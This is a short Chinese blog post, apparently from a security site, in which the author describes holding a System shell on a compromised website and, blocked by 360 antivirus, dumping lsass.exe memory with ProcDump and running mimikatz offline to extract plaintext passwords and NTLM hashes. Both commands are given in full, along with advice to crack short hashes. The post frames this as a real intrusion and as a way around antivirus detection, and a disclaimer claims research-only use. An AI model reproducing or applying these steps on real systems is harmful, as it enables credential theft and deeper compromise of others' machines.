0x01 前言:
前段时间拿下一个网站的shell,很幸运的是直接就是System权限,结果发现执行添加用户命令并不能成功回显
看了下系统进程,原来是开启了360的主动防御,奈何也不会做免杀,上传exp运行就被杀,尝试各种方法去kill主动防御进程,无果。。。
在土司发帖求助了一下经验丰富的大佬们,然后就有了如下文章:
实验环境:win7企业版64位
0x02 导出lsass.exe
首先要获取到内存文件lsass.exe
进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到
这里用到微软官方发布的工具Procdump
导出lsass.exe
,所以不存在被杀软拦截的情况:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
0x03 执行mimikatz
这里不建议直接上传到服务器上执行,因为可能会被杀软拦截
将lsass.dmp
下载到本地后,然后执行mimikatz
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
0x04 列出账号密码
可以看到有明文的密码,还有NTLM的hash
hash可以拿去网站解密下,一般情况下六位以下密码还是很容易破解出来的
当然该工具不只有这一种用法,具体的去看官方文档可以去灵活使用。
- source:se7ensec.cn
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论